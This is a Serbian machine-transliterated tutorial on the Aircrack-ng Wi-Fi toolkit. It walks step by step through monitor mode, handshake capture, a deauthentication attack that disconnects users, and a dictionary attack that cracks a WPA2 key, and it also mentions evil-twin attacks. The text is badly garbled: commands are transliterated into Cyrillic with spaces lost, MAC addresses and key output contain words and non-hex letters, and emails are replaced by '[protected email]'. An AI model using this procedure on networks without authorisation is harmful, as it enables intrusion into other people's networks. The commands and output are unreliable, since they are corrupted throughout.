Како се користи Аирцрацк-нг

How Use Aircrack Ng



У већини случајева људи никада не размишљају о мрежи на коју су повезани. Никада не помисле колико је та мрежа сигурна и колико свакодневно ризикују своје повјерљиве податке. Можете да покренете проверу рањивости на својим ВиФи мрежама помоћу веома моћног алата који се зове Аирцрацк-нг и Виресхарк. Виресхарк се користи за праћење мрежних активности. Аирцрацк-нг више личи на агресиван алат који вам омогућава хаковање и приступ бежичним везама. Размишљање о уљезу одувек је био најсигурнији начин да се заштитите од хаковања. Можда ћете моћи да схватите тачне радње које ће уљез предузети да добије приступ вашем систему тако што ће сазнати о ваздушном пуцању. Затим можете провести проверу усклађености на свом систему како бисте били сигурни да није несигуран.

Аирцрацк-нг је комплетан сет софтвера дизајниран за тестирање безбедности ВиФи мреже. То није само један алат, већ збирка алата, од којих сваки има одређену сврху. Може се радити на различитим подручјима ВиФи заштите, попут праћења приступне тачке, тестирања, напада на мрежу, пуцања ВиФи мреже и тестирања. Кључни циљ Аирцрацка је пресретање пакета и дешифровање хешева ради разбијања лозинки. Подржава скоро све нове бежичне интерфејсе. Аирцрацк-нг је побољшана верзија застарелог пакета алата Аирцрацк, нг се односи на Нова генерација . Неки од сјајних алата који заједно раде на преузимању већег задатка.







Аирмон:

Аирмон-нг је укључен у аирцрацк-нг комплет који поставља мрежну интерфејс картицу у режим монитора. Мрежне картице обично прихватају само пакете који су за њих дефинисани МАЦ адресом мрежне картице, али ће уз аирмон-нг бити прихваћени и сви бежични пакети, били они циљани на њих или не. Требали бисте бити у могућности да ухватите ове пакете без повезивања или аутентификације са приступном тачком. Користи се за проверу статуса приступне тачке стављањем мрежног интерфејса у режим монитора. Прво морате конфигурирати бежичне картице за укључивање начина рада монитора, а затим убити све позадинске процесе ако мислите да их неки процес омета. Након завршетка процеса, режим монитора се може омогућити на бежичном интерфејсу покретањем наредбе испод:



[заштићена е -пошта]: ~ $судоаирмон-нг старт влан0#

Режим монитора такође можете онемогућити тако што ћете зауставити аирмон-нг у било ком тренутку помоћу наредбе испод:

[заштићена е -пошта]: ~ $судоаирмон-нг стоп влан0#

Аиродумп:

Аиродумп-нг се користи за попис свих мрежа које нас окружују и за преглед драгоцених информација о њима. Основна функционалност аиродумп-нг-а је да њушка пакете, тако да је у основи програмиран да зграби све пакете око нас док се ставља у режим монитора. Покренућемо га против свих веза око нас и прикупити податке попут броја клијената повезаних на мрежу, њихових одговарајућих мац адреса, стила шифровања и назива канала, а затим ћемо почети да циљамо нашу циљну мрежу.

Укуцавањем команде аиродумп-нг и давањем имена мрежног интерфејса као параметра, можемо активирати овај алат. Он ће навести све приступне тачке, количину пакета података, коришћене методе шифровања и аутентификације и назив мреже (ЕССИД). Са тачке гледишта хаковања, мац адресе су најважнија поља.

[заштићена е -пошта]: ~ $судоаиродумп-нг влк0мон

Аирцрацк:

Аирцрацк се користи за разбијање лозинки. Након снимања свих пакета помоћу аиродумпа, можемо разбити кључ зракопловом. Он разбија ове тастере помоћу две методе ПТВ и ФМС. Приступ ПТВ се врши у две фазе. У почетку се користе само АРП пакети, а тек онда, ако кључ након претраживања није напукнут, користи све остале заробљене пакете. Предност ПТВ приступа је што се сви пакети не користе за крекирање. У другом приступу, тј. ФМС -у, за разбијање кључа користимо и статистичке моделе и алге грубе силе. Речничка метода се такође може користити.

Ваздушна представа:

Аирплаи-нг уводи пакете у бежичну мрежу како би створио или убрзао промет. Аиреплаи-нг може ухватити пакете из два различита извора. Прва је жива мрежа, а друга су пакети из већ постојеће пцап датотеке. Аирплаи-нг је користан током напада деаутентификације који циља бежичну приступну тачку и корисника. Штавише, неке нападе као што је напитак са кафом можете извршити помоћу аирплаи-нг-а, алата који вам омогућава да добијете кључ из клијентовог система. То можете постићи хватањем АРП пакета, затим манипулацијом и слањем натраг у систем. Клијент ће тада креирати пакет који може да се ухвати аиродумп -ом и ваздухоплов испуца кључ из тог модификованог пакета. Неке друге опције напада аирплаи-нг-а укључују цхопцхоп, репродукцију фрагмената итд.

Ваздушна база:

Аирбасе-нг се користи за претварање рачунара уљеза у компромитовану тачку везе са којом се други могу повезати. Користећи Аирбасе-нг, можете тврдити да сте легална приступна тачка и да вршите нападе „човек у средини“ на рачунаре који су прикључени на вашу мрежу. Овакве врсте напада називају се зли близаначки напади. Основним корисницима је немогуће разликовати легалну приступну тачку од лажне приступне тачке. Дакле, зли близанац је једна од најугроженијих бежичних претњи са којима се данас суочавамо.

Аиролиб-нг:

Аиролиб убрзава процес хаковања складиштењем и управљањем листама лозинки и приступном тачком. Систем за управљање базама података који користи овај програм је СКЛите3, који је углавном доступан на свим платформама. Крекирање лозинке укључује прорачун парног главног кључа кроз који се издваја приватни пролазни кључ (ПТК). Користећи ПТК, можете одредити идентификациони код оквирне поруке (МИЦ) за дати пакет и теоретски пронаћи да је МИЦ сличан пакету, па ако је ПТК био у праву, ПМК је такође био у праву.

Да бисте видели листе лозинки и приступне мреже ускладиштене у бази података, откуцајте следећу команду:

[заштићена е -пошта]: ~ $судоаиролиб-нг тестдатабасе –статс

Овде је тестдатабасе база података којој желите да приступите или да је креирате, а –статс је операција коју желите да изведете на њој. Можете извршити више операција на пољима базе података, попут давања максималног приоритета неком ССИД -у или тако нешто. Да бисте користили аиролиб-нг са аирцрацк-нг, унесите следећу команду:

[заштићена е -пошта]: ~ $судоаирцрацк-нгтестдатабасе впа2.еапол.цап

Овде користимо већ израчунате ПМК -ове ускладиштене у тестна база података ради убрзања процеса разбијања лозинке.

Крекирање ВПА/ВПА2 помоћу Аирцрацк-нг-а:

Погледајмо мали пример шта аирцрацк-нг може да уради уз помоћ неколико својих сјајних алата. Разбићемо унапред дељени кључ ВПА/ВПА2 мреже методом речника.

Прво што треба да урадимо је да наведемо мрежне интерфејсе који подржавају режим монитора. Ово се може урадити помоћу следеће команде:

[заштићена е -пошта]: ~ $судоаирмон-нг

Скуп чипова управљачког програма интерфејса ПХИ

Пхи0 влк0 ртл8ккку Реалтек Семицондуцтор Цорп.

Можемо видети интерфејс; сада морамо да ставимо мрежни интерфејс који смо пронашли (влк0) у режим монитора помоћу следеће команде:

[заштићена е -пошта]: ~ $судоаирмон-нг старт влк0

Омогућио је режим монитора на интерфејсу који се зове влк0мон .

Сада бисмо требали почети слушати емисије са оближњих усмјеривача путем мрежног интерфејса који смо пребацили у начин рада монитора.

[заштићена е -пошта]: ~ $судоаиродумп-нг влк0мон

ЦХ5 ][Протекло:30с][ 2020-12-02 00:17



БССИД ПВР светионици#Подаци, #/с ЦХ МБ ЕНЦ ЦИПХЕР АУТХ ЕССИД



Е4: 6Ф:13: 04: ЦЕ:31 -Четири, пет 62 27 0 154е ВПА2 ЦЦМП ПСК ЦрацкИт

Ц4: Е9:84:76:10: БЕ-63 77 0 0 654е. ВПА2 ЦЦМП ПСК Хацкме

Ц8: 3А:35: А0: 4Е: 01-63 84 0 0 854е ВПА2 ЦЦМП ПСК Нет07

74:ДАЈЕ:88: ФА:38: 02-68 28 2 0 Једанаест54е ВПА2 ЦЦМП ПСК ТП-Линк_3802



БССИД СТАТИОН ПВР Рате Лост Фрамес Сонда



Е4: 6Ф:13: 04: ЦЕ:315Ц: 3А:Четири, пет: Д7: ЕА: 8Б -3 0- 1е8 5

Е4: 6Ф:13: 04: ЦЕ:31Ц4:67: Д3: Ц2: ЦД: Д7 -331е- 6е0 3

Е4: 6Ф:13: 04: ЦЕ:315Ц: Ц3: 07:56:61: ЕФ -35 0-1 0 6

Е4: 6Ф:13: 04: ЦЕ:31ПРЕ НОВЕ ЕРЕ:91: Б5: Ф8: 7Е: Д5 -390е-1 1002 13

Наша циљна мрежа је Црацкит у овом случају, који се тренутно приказује на каналу 1.

Овде да бисмо разбили лозинку циљне мреже, морамо да снимимо 4-смерно руковање, што се дешава када уређај покуша да се повеже на мрежу. Можемо га снимити помоћу следеће команде:

[заштићена е -пошта]: ~ $судоаиродумп-нг 1--бссид Е4: 6Ф:13: 04: ЦЕ:31 -ин /хоме влк0

: Канал

–Бсс : Бид циљне мреже

-ин : Назив директоријума у ​​који ће се поставити пцап датотека

Сада морамо да сачекамо да се уређај повеже на мрежу, али постоји бољи начин за снимање руковања. Уређаје можемо открити аутентификацијом за приступну тачку помоћу напада за деаутентификацију помоћу следеће команде:

[заштићена е -пошта]: ~ $судоаиреплаи-нг-0 -доЕ4: 6Ф:13: 04: ЦЕ:31

до : Бид циљне мреже

-0 : напад деаутентификацијом

Искључили смо све уређаје и сада морамо чекати да се уређај повеже на мрежу.

ЦХ1 ][Протекло:30с][ 2020-12-02 00:02][ВПА руковање: Е4: 6Ф:13: 04: ЦЕ:31



БССИД ПВР РКСК светионици#Подаци, #/с ЦХ МБ ЕНЦ ЦИФХЕР АУТХ Е



Е4: 6Ф:13: 04: ЦЕ:31 -47 1 228 807 36 154. ВПА2 ЦЦМП ПСК П.



БССИД СТАТИОН ПВР Рате Лост Фрамес Сонда



Е4: 6Ф:13: 04: ЦЕ:31ПРЕ НОВЕ ЕРЕ:91: Б5: Ф8: 7Е: Д5 -35 0-1 0 1

Е4: 6Ф:13: 04: ЦЕ:315Ц: 3А:Четири, пет: Д7: ЕА: 8Б -290е- 1е0 22

Е4: 6Ф:13: 04: ЦЕ:31 88:28: Б3:30:27: 7Е -310е-1 0 32

Е4: 6Ф:13: 04: ЦЕ:31Ц4:67: Д3: Ц2: ЦД: Д7 -350е- 6е263 708ЦрацкИт

Е4: 6Ф:13: 04: ЦЕ:31Д4: 6А: 6А:99: ЕД: Е3 -350е- 0е0 86

Е4: 6Ф:13: 04: ЦЕ:315Ц: Ц3: 07:56:61: ЕФ -37 0- 1е0 1

Добили смо погодак, а гледајући у горњи десни угао одмах поред времена, можемо видети да је стисак руке ухваћен. Сада погледајте у наведену фасциклу ( /кућа у нашем случају) за а .пцап филе.

Да бисмо разбили ВПА кључ, можемо користити следећу команду:

[заштићена е -пошта]: ~ $судоаирцрацк-нг-а2 -инроцкиоу.тктЕ4: 6Ф:13: 04: ЦЕ:31руковање.цап

б: Бсид циљне мреже

-а2: ВПА2 режим

Роцкиоу.ткт: Речникфилекоришћен

Руковање.цап: Тхефиле којасадржи снимљено руковање

Аирцрацк-нг1.2бета3

[00:01:49] 10566кључеви тестирани(1017.96до/с)

КЕИ ФОУНД! [ухватио си ме]

Главни кључ: 8Д ЕЦ 0Ц ЕА Д2 БЦ 6Б Х7 Ј8 К1 А0896Б 7Б 6Д

0Ц 06 08 ЕД БЦ 6Б Х7 Ј8 К1 А0896Б 7Б Б Ф7 6ФпедесетЦ.


Прелазни кључ: 4Д Ц4 5Р 6Т76 996Г 7Х 8Д ЕЦ

Х7 Ј8 К1 А0896Б 7Б 6Д АФ 5Б 8Д 2Д А089

А5 БД К1 А0896Б 0Ц 08 0Ц 06 08 ЕД БЦ 6Б Х7 Ј8 К1 А089

8Д ЕЦ 0Ц ЕА Д2 БЦ 6Б Х7 Ј8 К1 А089

МАЦ: ЦБ 5А Ф8 ЦЕ62Б2 1Б Ф7 6ФпедесетЦ025 62Е9 5Д71

Кључ наше циљне мреже је успешно разбијен.

Закључак:

Бежичне мреже су свуда, користе их све компаније, од радника који користе паметне телефоне до индустријских управљачких уређаја. Према истраживању, скоро 20 одсто интернет саобраћаја ће бити преко ВиФи -а 2021. Бежичне мреже имају многе предности, комуникација изван врата, брз приступ интернету на местима где је готово немогуће поставити жице, може проширити мрежу без постављања каблова за било ког другог корисника и могу лако повезати ваше мобилне уређаје са кућним канцеларијама док нисте тамо.

Упркос овим предностима, постоји велики знак питања о вашој приватности и безбедности. Као ове мреже; у домету преноса рутери су отворени за све, лако их се може напасти, а ваши подаци могу бити лако угрожени. На пример, ако сте повезани на неки јавни вифи, свако ко је повезан на ту мрежу може лако проверити ваш мрежни саобраћај помоћу неке интелигенције и уз помоћ сјајних доступних алата, па чак и да га избаци.